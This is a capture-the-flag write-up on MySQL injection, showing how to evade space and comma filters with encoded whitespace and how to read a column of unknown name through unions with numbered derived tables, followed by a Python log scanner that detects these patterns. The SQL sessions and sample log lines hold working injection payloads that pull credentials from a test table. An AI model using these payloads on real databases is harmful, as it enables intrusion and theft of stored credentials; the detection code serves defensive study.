How to bypass unknown field names in MySQL

Preface

This article walks through the fifth challenge of DDCTF and the technique it called for: bypassing an unknown column name. The steps are reproduced here on a local MySQL instance. The idea is elegant and clear, so it is worth sharing. Let's look at the details:

Implementation ideas

The challenge filters spaces and commas. Spaces can be replaced with %0a, %0b, %0c, %0d or %a0, or avoided entirely by using parentheses. Commas can be avoided by using join.

The column holding the flag has an unknown name, and the hex-encoded table name is also filtered in queries against information_schema.columns, so the column name cannot be looked up. In that situation a union query can be used, as follows:

The idea is to make the flag appear under a column name we know. Each derived table (select N)x contributes one column whose name is the literal N, so a union of those derived tables with the real table inherits the numeric names, and the flag column can be referenced as e.4 without ever knowing its real name:

Sample code:

mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------------+
| 1 | 2     | 3        | 4                 |
+---+-------+----------+-------------------+
| 1 | 2     | 3        | 4                 |
| 1 | admin | admin888 | [email protected] |
| 2 | test  | test123  | [email protected] |
| 3 | cs    | cs123    | [email protected] |
+---+-------+----------+-------------------+
4 rows in set (0.01 sec)

mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------------+
| 4                 |
+-------------------+
| 4                 |
| [email protected] |
| [email protected] |
| [email protected] |
+-------------------+
4 rows in set (0.03 sec)

mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
+-------------------+
| 4                 |
+-------------------+
| [email protected] |
+-------------------+
1 row in set (0.01 sec)

mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d
union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------------+----------+----------+-------------------+
| id                | username | password | email             |
+-------------------+----------+----------+-------------------+
| 1                 | admin    | admin888 | [email protected] |
| [email protected] | 1        | 1        | 1                 |
+-------------------+----------+----------+-------------------+
2 rows in set (0.04 sec)
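Seen from the logging side, the same whitespace substitutions that defeat a naive "no spaces" filter also defeat a naive "union select" log search. The following is an added example, not code from the article or the CTF, that canonicalizes the %0a/%0b/%0c/%0d/%a0 bytes and parenthesis separators named above before matching, and flags the (select N)x derived-table pattern the article relies on; the log lines, hosts and paths are constructed. Parameterized queries remain the actual fix; this is only a heuristic for finding attempts in access logs.

```python
import re
from urllib.parse import unquote_to_bytes

# Bytes the MySQL lexer accepts as whitespace but naive "no spaces" filters
# miss: the %0a %0b %0c %0d %a0 bypasses listed above, plus space and tab.
MYSQL_WS = re.compile(rb"[\x09\x0a\x0b\x0c\x0d\x20\xa0]+")

def normalize(raw: str) -> str:
    """URL-decode once (as the server would) and canonicalize separators so
    'union%0aselect' and 'union(select' both read 'union ( select'."""
    b = MYSQL_WS.sub(b" ", unquote_to_bytes(raw))
    b = re.sub(rb"([()])", rb" \1 ", b)  # parentheses also separate tokens
    return re.sub(rb" +", b" ", b).decode("latin-1").lower().strip()

# UNION [ALL|DISTINCT] SELECT, with '(' accepted in place of whitespace.
UNION_SELECT = re.compile(
    r"\bunion\b(?:\s*\(?\s*(?:all|distinct)\b)?(?:\s*\(\s*|\s+)select\b")
# The column-renaming trick shown above: a "(select 1)a" derived table.
DERIVED_ALIAS = re.compile(r"\(\s*select\s+\d+\s*\)\s*[a-z_]\w*")

def is_suspicious(raw_query: str) -> bool:
    q = normalize(raw_query)
    return bool(UNION_SELECT.search(q) or DERIVED_ALIAS.search(q))

def scan(log_lines):
    """Return (line_no, normalized_query) for each request that matches."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        # constructed access-log shape: "<ip> GET <path>?<query>"
        query = line.split("?", 1)[1] if "?" in line else ""
        if is_suspicious(query):
            hits.append((n, normalize(query)))
    return hits

# Constructed sample log lines (hypothetical hosts and paths).
SAMPLE_LOG = [
    "10.0.0.5 GET /user?id=1",
    "10.0.0.5 GET /user?id=1%0aunion%0aselect%0a1%0a2",
    "10.0.0.7 GET /user?id=1%a0union(select(1))",
    "10.0.0.9 GET /user?id=1%0bunion%0cselect%0d*%0dfrom(select%0a1)a",
    "10.0.0.2 GET /search?q=reunion%20select%20committee",
]

if __name__ == "__main__":
    for n, q in scan(SAMPLE_LOG):
        print(f"line {n}: {q}")
```

The word boundary in UNION_SELECT keeps ordinary text such as "reunion select committee" from matching, which is why the last sample line is not reported.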

Summary

That is the full content of this article. I hope it is of some help in your study or work. If you have any questions, leave a comment below.
